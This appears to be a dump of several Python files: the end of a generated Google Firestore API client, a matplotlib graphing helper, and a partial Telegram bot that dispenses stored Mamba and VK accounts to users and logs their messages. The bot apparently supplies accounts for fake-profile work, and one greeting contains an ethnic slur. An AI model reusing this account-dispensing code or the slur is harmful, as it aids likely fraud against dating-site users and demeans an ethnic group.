path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}:listCollectionIds',
request_field='listCollectionIdsRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsListCollectionIdsRequest',
response_type_name='ListCollectionIdsResponse',
supports_download=False,
)
def Listen(self, request, global_params=None):
r"""Listens to changes.
Args:
request: (FirestoreProjectsDatabasesDocumentsListenRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListenResponse) The response message.
"""
config = self.GetMethodConfig('Listen')
return self._RunMethod(
config, request, global_params=global_params)
Listen.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:listen',
http_method='POST',
method_id='firestore.projects.databases.documents.listen',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:listen',
request_field='listenRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsListenRequest',
response_type_name='ListenResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
r"""Updates or inserts a document.
Args:
request: (FirestoreProjectsDatabasesDocumentsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Document) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}',
http_method='PATCH',
method_id='firestore.projects.databases.documents.patch',
ordered_params=['name'],
path_params=['name'],
query_params=['currentDocument_exists', 'currentDocument_updateTime', 'mask_fieldPaths', 'updateMask_fieldPaths'],
relative_path='v1/{+name}',
request_field='document',
request_type_name='FirestoreProjectsDatabasesDocumentsPatchRequest',
response_type_name='Document',
supports_download=False,
)
def Rollback(self, request, global_params=None):
r"""Rolls back a transaction.
Args:
request: (FirestoreProjectsDatabasesDocumentsRollbackRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Rollback')
return self._RunMethod(
config, request, global_params=global_params)
Rollback.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:rollback',
http_method='POST',
method_id='firestore.projects.databases.documents.rollback',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:rollback',
request_field='rollbackRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsRollbackRequest',
response_type_name='Empty',
supports_download=False,
)
def RunQuery(self, request, global_params=None):
r"""Runs a query.
Args:
request: (FirestoreProjectsDatabasesDocumentsRunQueryRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RunQueryResponse) The response message.
"""
config = self.GetMethodConfig('RunQuery')
return self._RunMethod(
config, request, global_params=global_params)
RunQuery.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}:runQuery',
http_method='POST',
method_id='firestore.projects.databases.documents.runQuery',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}:runQuery',
request_field='runQueryRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsRunQueryRequest',
response_type_name='RunQueryResponse',
supports_download=False,
)
def Write(self, request, global_params=None):
r"""Streams batches of document updates and deletes, in order.
Args:
request: (FirestoreProjectsDatabasesDocumentsWriteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(WriteResponse) The response message.
"""
config = self.GetMethodConfig('Write')
return self._RunMethod(
config, request, global_params=global_params)
Write.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:write',
http_method='POST',
method_id='firestore.projects.databases.documents.write',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:write',
request_field='writeRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsWriteRequest',
response_type_name='WriteResponse',
supports_download=False,
)
class ProjectsDatabasesOperationsService(base_api.BaseApiService):
"""Service class for the projects_databases_operations resource."""
_NAME = 'projects_databases_operations'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesOperationsService, self).__init__(client)
self._upload_configs = {
}
def Cancel(self, request, global_params=None):
r"""Starts asynchronous cancellation on a long-running operation. The server.
makes a best effort to cancel the operation, but success is not
guaranteed. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`. Clients can use
Operations.GetOperation or
other methods to check whether the cancellation succeeded or whether the
operation completed despite cancellation. On successful cancellation,
the operation is not deleted; instead, it becomes an operation with
an Operation.error value with a google.rpc.Status.code of 1,
corresponding to `Code.CANCELLED`.
Args:
request: (FirestoreProjectsDatabasesOperationsCancelRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Cancel')
return self._RunMethod(
config, request, global_params=global_params)
Cancel.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/operations/{operationsId}:cancel',
http_method='POST',
method_id='firestore.projects.databases.operations.cancel',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:cancel',
request_field='googleLongrunningCancelOperationRequest',
request_type_name='FirestoreProjectsDatabasesOperationsCancelRequest',
response_type_name='Empty',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes a long-running operation. This method indicates that the client is.
no longer interested in the operation result. It does not cancel the
operation. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request: (FirestoreProjectsDatabasesOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/operations/{operationsId}',
http_method='DELETE',
method_id='firestore.projects.databases.operations.delete',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesOperationsDeleteRequest',
response_type_name='Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Gets the latest state of a long-running operation. Clients can use this.
method to poll the operation result at intervals as recommended by the API
service.
Args:
request: (FirestoreProjectsDatabasesOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/operations/{operationsId}',
http_method='GET',
method_id='firestore.projects.databases.operations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesOperationsGetRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists operations that match the specified filter in the request. If the.
server doesn't support this method, it returns `UNIMPLEMENTED`.
NOTE: the `name` binding allows API services to override the binding
to use different resource name schemes, such as `users/*/operations`. To
override the binding, API services can add a binding such as
`"/v1/{name=users/*}/operations"` to their service configuration.
For backwards compatibility, the default name includes the operations
collection id, however overriding users must ensure the name binding
is the parent resource, without the operations collection id.
Args:
request: (FirestoreProjectsDatabasesOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningListOperationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/operations',
http_method='GET',
method_id='firestore.projects.databases.operations.list',
ordered_params=['name'],
path_params=['name'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1/{+name}/operations',
request_field='',
request_type_name='FirestoreProjectsDatabasesOperationsListRequest',
response_type_name='GoogleLongrunningListOperationsResponse',
supports_download=False,
)
class ProjectsDatabasesService(base_api.BaseApiService):
"""Service class for the projects_databases resource."""
_NAME = 'projects_databases'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesService, self).__init__(client)
self._upload_configs = {
}
def ExportDocuments(self, request, global_params=None):
r"""Exports a copy of all or a subset of documents from Google Cloud Firestore.
to another storage system, such as Google Cloud Storage. Recent updates to
documents may not be reflected in the export. The export occurs in the
background and its progress can be monitored and managed via the
Operation resource that is created. The output of an export may only be
used once the associated operation is done. If an export operation is
cancelled before completion it may leave partial data behind in Google
Cloud Storage.
Args:
request: (FirestoreProjectsDatabasesExportDocumentsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('ExportDocuments')
return self._RunMethod(
config, request, global_params=global_params)
ExportDocuments.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}:exportDocuments',
http_method='POST',
method_id='firestore.projects.databases.exportDocuments',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:exportDocuments',
request_field='googleFirestoreAdminV1ExportDocumentsRequest',
request_type_name='FirestoreProjectsDatabasesExportDocumentsRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def ImportDocuments(self, request, global_params=None):
r"""Imports documents into Google Cloud Firestore. Existing documents with the.
same name are overwritten. The import occurs in the background and its
progress can be monitored and managed via the Operation resource that is
created. If an ImportDocuments operation is cancelled, it is possible
that a subset of the data has already been imported to Cloud Firestore.
Args:
request: (FirestoreProjectsDatabasesImportDocumentsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('ImportDocuments')
return self._RunMethod(
config, request, global_params=global_params)
ImportDocuments.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}:importDocuments',
http_method='POST',
method_id='firestore.projects.databases.importDocuments',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:importDocuments',
request_field='googleFirestoreAdminV1ImportDocumentsRequest',
request_type_name='FirestoreProjectsDatabasesImportDocumentsRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
class ProjectsLocationsService(base_api.BaseApiService):
"""Service class for the projects_locations resource."""
_NAME = 'projects_locations'
def __init__(self, client):
super(FirestoreV1.ProjectsLocationsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets information about a location.
Args:
request: (FirestoreProjectsLocationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Location) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/locations/{locationsId}',
http_method='GET',
method_id='firestore.projects.locations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsLocationsGetRequest',
response_type_name='Location',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists information about the supported locations for this service.
Args:
request: (FirestoreProjectsLocationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListLocationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/locations',
http_method='GET',
method_id='firestore.projects.locations.list',
ordered_params=['name'],
path_params=['name'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1/{+name}/locations',
request_field='',
request_type_name='FirestoreProjectsLocationsListRequest',
response_type_name='ListLocationsResponse',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = 'projects'
def __init__(self, client):
super(FirestoreV1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
|
[
"ige-public@hotmail.com"
] |
ige-public@hotmail.com
|
524246a6a70b4894f83eeaef95da242ddd7c0ae0
|
d5ab427f918849fabb5a6cc7efc15ebc71e3f9de
|
/graph.py
|
31f3a8d623c797c9295444433c22b6b9108a29e8
|
[] |
no_license
|
wizacass/Intelektika_Proj
|
d189194b1f93e03614536fc272b704ad48cafb5e
|
76700550eaeaa5483ee37a337455014a912bcbb4
|
refs/heads/master
| 2023-05-09T06:35:53.806076
| 2021-05-25T15:46:13
| 2021-05-25T15:46:13
| 370,747,206
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,682
|
py
|
import matplotlib.pyplot as plt
import numpy as np
import math
from collections import Counter
class Grapher:
def __init__(self, dataset: str):
self.dataset = dataset
def histo(self, attribute, binary=False):
if binary:
counter = Counter(attribute.values)
plt.bar(counter.keys(), counter.values())
else:
counts, bins = np.histogram(attribute.values)
plt.hist(bins[:-1], bins, weights=counts)
plt.xlabel(attribute.name)
plt.ylabel("Count")
plt.savefig(f"results/graphs/{self.dataset}/{attribute.name}.png")
plt.clf()
def scatter(self, attributeX, attributeY):
plt.xlabel(attributeX.name)
plt.ylabel(attributeY.name)
plt.scatter(attributeX.values, attributeY.values, alpha=0.5)
plt.savefig(
f"results/graphs/{self.dataset}/{attributeX.name} on {attributeY.name}.png")
plt.clf()
def splom(self, attributes):
count = len(attributes)
r = range(0, count)
for i in r:
for j in r:
ax = plt.subplot2grid((count, count), (i, j))
ax.set_axis_off()
if i != j:
ax.scatter(
attributes[i].values,
attributes[j].values,
s=0.5, alpha=0.25
)
plt.savefig(
f"results/graphs/{self.dataset}/splom.png",
dpi=1200
)
plt.clf()
def bar_plot(self, attribute, label=""):
counter = Counter(attribute.values)
plt.bar(counter.keys(), counter.values())
plt.xlabel(attribute.name)
plt.ylabel("Count")
plt.savefig(
f"results/graphs/{self.dataset}/bar_{attribute.name} {label}.png")
plt.clf()
def box_plot(self, attributes: list, labelX: str, labelY: str):
plt.boxplot(attributes)
plt.xticks([1, 2], ["True", "False"])
plt.xlabel(labelX)
plt.ylabel(labelY)
plt.savefig(
f"results/graphs/{self.dataset}/box_{labelX} on {labelY}.png")
plt.clf()
def correlation_matrix(self, correlation_data: list, labels: list):
plt.matshow(correlation_data)
plt.colorbar()
plt.xticks(range(0, len(correlation_data[0])), labels, rotation=45)
plt.yticks(range(0, len(correlation_data[1])), labels, rotation=45)
plt.savefig(
f"results/graphs/{self.dataset}/correlation_matrix.png")
plt.clf()
def __column_count(self, size):
count = 1 + 3.22 * (math.log(math.e) ** size)
return int(round(count))
|
[
"visak.pet0@gmail.com"
] |
visak.pet0@gmail.com
|
7e9ed44cfcf4dfe7080d14f4c8a120d31b1b1584
|
c025d4f76f37d4792299dd7239320d3327e1f7b2
|
/main test2
|
d175c5cb1966ce95b9d57093b43581e040469229
|
[] |
no_license
|
vadiz/TESTBOT
|
c49ac3faae4ad55e6448d1d5d0fe831e827f9d1d
|
6ada4413a2767077db366b8dfc95d93df533b944
|
refs/heads/master
| 2021-09-05T21:28:00.296686
| 2018-01-31T04:51:34
| 2018-01-31T04:51:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 103,997
|
#coding:utf-8
import telebot, config
from telebot import types
import datetime
from datetime import date
import time
import os
import sys
import subprocess
import string
import re
import random
from collections import Counter
knownUsers = [] # todo: save these in a file,
userStep = {} # so they won't reset every time the bot restarts
def get_user_step(uid):
if uid in userStep:
return userStep[uid]
else:
knownUsers.append(uid)
userStep[uid] = 0
return 0
def listener(messages):
for m in messages:
if m.content_type == 'text':
date = datetime.date.today()
print (str(m.chat.first_name) + " [" + str(m.chat.id) + "]: " + m.text)
vremya = time.asctime(time.localtime(time.time()))
print (vremya)
spisok = [str(vremya) + '-' + str(m.chat.first_name) + " [" + str(m.chat.id) + "]: " + m.text]
filename = str(date) + "_" + m.chat.first_name +'.txt'
spisok2 = open("/home/makar/rabotayet/Bot_working/logs/" + filename, 'a')
for index in spisok:
spisok2.write(index + '\n')
spisok2.close
bot=telebot.TeleBot(config.TOKEN)
bot.set_update_listener(listener)
def main():
@bot.message_handler(commands=["start"])
def handle_text(message):
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
priv = ('Привет;)', 'Давай работать, что-ли?:Р', 'Хочешь аккаунтов?)', 'Мамбы, вк!! Легко и просто!!!', 'Нажми на кно... Хотя нет, не нажим... Жми, короче, я согласен...Может...', 'Давай нажимать кнопочки и ломать меня))', 'Люблю, когда нажимают кнопочки))', 'Надоели хачики? Попроси картиночку!!')
#orig_mamba = open('mambaorig.txt', 'r+')
rab_mamba = open('mamba.txt', 'r+')
mamba_list = (rab_mamba.read())
mambalist = mamba_list.split('\n')
mambishche = [x for x in mambalist if x != '']
mambaresultat = str(len(mambishche))
print(mambaresultat)
#omambalist = (orig_mamba.read())
#omamba_list = omambalist.split('\n')
#result = []
#for index in mambishche:
# if index in omamba_list:
# result.append(index)
#print(len(result))
#mambaresultat = str(len(result))
#############
#orig_vk = open('vkorig.txt', 'r+')
rab_vk = open('vk.txt', 'r+')
vk_list = (rab_vk.read())
vklist = vk_list.split('\n')
vk_proverka = [x for x in vklist if x != '']
vkresultat = str(len(vk_proverka))
print(vkresultat)
#ovk_list = (orig_vk.read())
#ovklist = ovk_list.split('\n')
#vkresult = []
#for index in vk_proverka:
# if index in ovklist:
# vkresult.append(index)
#print(vkresult)
#print(len(vkresult))
#vkresultat = str(len(vkresult))
############
#orig_mamba_ua = open('mambaorigua.txt', 'r+')
rab_mamba_ua = open('mambaua.txt', 'r+')
mamba_list_ua = (rab_mamba_ua.read())
mambalist_ua = mamba_list_ua.split('\n')
mambishche_ua = [x for x in mambalist_ua if x != '']
mambauaresult = str(len(mambishche_ua))
print(mambauaresult)
#omambalist_ua = (orig_mamba_ua.read())
#omamba_list_ua = omambalist_ua.split('\n')
#mamba_ua_result = []
#for index in mambishche_ua:
# if index in omamba_list_ua:
# mamba_ua_result.append(index)
#print(len(mamba_ua_result))
#mambauaresult = str(len(mamba_ua_result))
#############
#orig_vkua = open('vkorigua.txt', 'r+')
rab_vkua = open('vkkiev.txt', 'r+')
vk_list_ua = (rab_vkua.read())
vklist_ua = vk_list_ua.split('\n')
vk_proverka_ua = [x for x in vklist_ua if x != '']
vkuaresultat = str(len(vk_proverka_ua))
print(vkuaresultat)
#ovk_list_ua = (orig_vkua.read())
#ovklist_ua = ovk_list_ua.split('\n')
#vkresult_ua = []
#for index in vk_proverka_ua:
# if index in ovklist_ua:
# vkresult_ua.append(index)
#print(len(vkresult_ua))
#vkuaresultat = str(len(vkresult_ua))
user_markup.row('Нужна мамба на Киев')
user_markup.row('Получить вк Киев')
user_markup.row('Получить мамбу МСК')
user_markup.row('Получить вк МСК')
user_markup.row('КНОПКА')
bot.send_message(message.from_user.id, random.choice(priv), reply_markup=user_markup)
bot.send_message(message.chat.id, 'У меня есть в наличии много вкусностей:)\n')
bot.send_message(message.chat.id, 'Mamba.ru: ' + mambaresultat + '\nVk.com: ' + vkresultat + '\nMamba.UA: ' + mambauaresult + '\nvk.com(ua): ' + vkuaresultat)
@bot.message_handler(func=lambda message: message.text == "КНОПКА")
def handle_text(message):
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(message.from_user.id, 'Иди ко мне, сладкая...')
kartink = random.choice(os.listdir("/home/makar/rabotayet/Bot_working/kartinki/"))
kartinka = "/home/makar/rabotayet/Bot_working/kartinki/" + kartink
print (kartink)
print (kartinka)
bot.send_photo(message.from_user.id, open(kartinka, 'rb'))
@bot.message_handler(commands=["help"])
def start(message):
bot.send_message(message.chat.id, '')
@bot.message_handler(func=lambda message: message.text == "На главную")
def handle_text(message):
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
#orig_mamba = open('mambaorig.txt', 'r+')
rab_mamba = open('mamba.txt', 'r+')
mamba_list = (rab_mamba.read())
mambalist = mamba_list.split('\n')
mambishche = [x for x in mambalist if x != '']
mambaresultat = str(len(mambishche))
print(mambaresultat)
#omambalist = (orig_mamba.read())
#omamba_list = omambalist.split('\n')
#result = []
#for index in mambishche:
# if index in omamba_list:
# result.append(index)
#print(len(result))
#mambaresultat = str(len(result))
#############
#orig_vk = open('vkorig.txt', 'r+')
rab_vk = open('vk.txt', 'r+')
vk_list = (rab_vk.read())
vklist = vk_list.split('\n')
vk_proverka = [x for x in vklist if x != '']
vkresultat = str(len(vk_proverka))
print(vkresultat)
#ovk_list = (orig_vk.read())
#ovklist = ovk_list.split('\n')
#vkresult = []
#for index in vk_proverka:
# if index in ovklist:
# vkresult.append(index)
#print(vkresult)
#print(len(vkresult))
#vkresultat = str(len(vkresult))
############
#orig_mamba_ua = open('mambaorigua.txt', 'r+')
rab_mamba_ua = open('mambaua.txt', 'r+')
mamba_list_ua = (rab_mamba_ua.read())
mambalist_ua = mamba_list_ua.split('\n')
mambishche_ua = [x for x in mambalist_ua if x != '']
mambauaresult = str(len(mambishche_ua))
print(mambauaresult)
#omambalist_ua = (orig_mamba_ua.read())
#omamba_list_ua = omambalist_ua.split('\n')
#mamba_ua_result = []
#for index in mambishche_ua:
# if index in omamba_list_ua:
# mamba_ua_result.append(index)
#print(len(mamba_ua_result))
#mambauaresult = str(len(mamba_ua_result))
#############
#orig_vkua = open('vkorigua.txt', 'r+')
rab_vkua = open('vkkiev.txt', 'r+')
vk_list_ua = (rab_vkua.read())
vklist_ua = vk_list_ua.split('\n')
vk_proverka_ua = [x for x in vklist_ua if x != '']
vkuaresultat = str(len(vk_proverka_ua))
print(vkuaresultat)
#ovk_list_ua = (orig_vkua.read())
#ovklist_ua = ovk_list_ua.split('\n')
#vkresult_ua = []
#for index in vk_proverka_ua:
# if index in ovklist_ua:
# vkresult_ua.append(index)
#print(len(vkresult_ua))
#vkuaresultat = str(len(vkresult_ua))
user_markup.row('Нужна мамба на Киев')
user_markup.row('Получить вк Киев')
user_markup.row('Получить мамбу МСК')
user_markup.row('Получить вк МСК')
user_markup.row('КНОПКА')
glavn = ('Опять мы тут, продолжим же)', 'Что-нибудь еще?', 'Продолжаем.', 'Ну, что еще?','Меня разорили...','Я снова потерял часть себя:(','Желаете еще чего-нибудь?')
bot.send_message(message.from_user.id, random.choice(glavn), reply_markup=user_markup)
bot.send_message(message.chat.id, 'Теперь у меня: \n' +'Mamba.ru: ' + mambaresultat + '\nVk.com: ' + vkresultat + '\nMamba.UA: ' + mambauaresult + '\nvk.com(ua): ' + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Нужна мамба на Киев")
def handle_text(message):
#orig_mamba_ua = open('mambaorigua.txt', 'r+')
rab_mamba_ua = open('mambaua.txt', 'r+')
mamba_list_ua = (rab_mamba_ua.read())
mambalist_ua = mamba_list_ua.split('\n')
mambishche_ua = [x for x in mambalist_ua if x != '']
mambauaresult = str(len(mambishche_ua))
print(mambauaresult)
#omambalist_ua = (orig_mamba_ua.read())
#omamba_list_ua = omambalist_ua.split('\n')
#mamba_ua_result = []
#for index in mambishche_ua:
# if index in omamba_list_ua:
# mamba_ua_result.append(index)
#print(len(mamba_ua_result))
#mambauaresult = str(len(mamba_ua_result))
if mambauaresult == '1' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одна мамба')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько нужно? \nОстаток: " + mambauaresult, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одна мамба")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
elif mambauaresult == '2' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одна мамба')
user_markup.row('Две мамбы')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько нужно? \nОстаток: " + mambauaresult, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одна мамба")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Две мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua)
bot.send_message(m.chat.id, mambaua1, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
elif mambauaresult == '3' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одна мамба')
user_markup.row('Две мамбы')
user_markup.row('Три мамбы')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько нужно? \nОстаток: " + mambauaresult, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одна мамба")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Две мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua)
bot.send_message(m.chat.id, mambaua1, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Три мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
elif mambauaresult == '4' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одна мамба')
user_markup.row('Две мамбы')
user_markup.row('Три мамбы')
user_markup.row('Четыре мамбы')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько нужно? \nОстаток: " + mambauaresult, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одна мамба")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
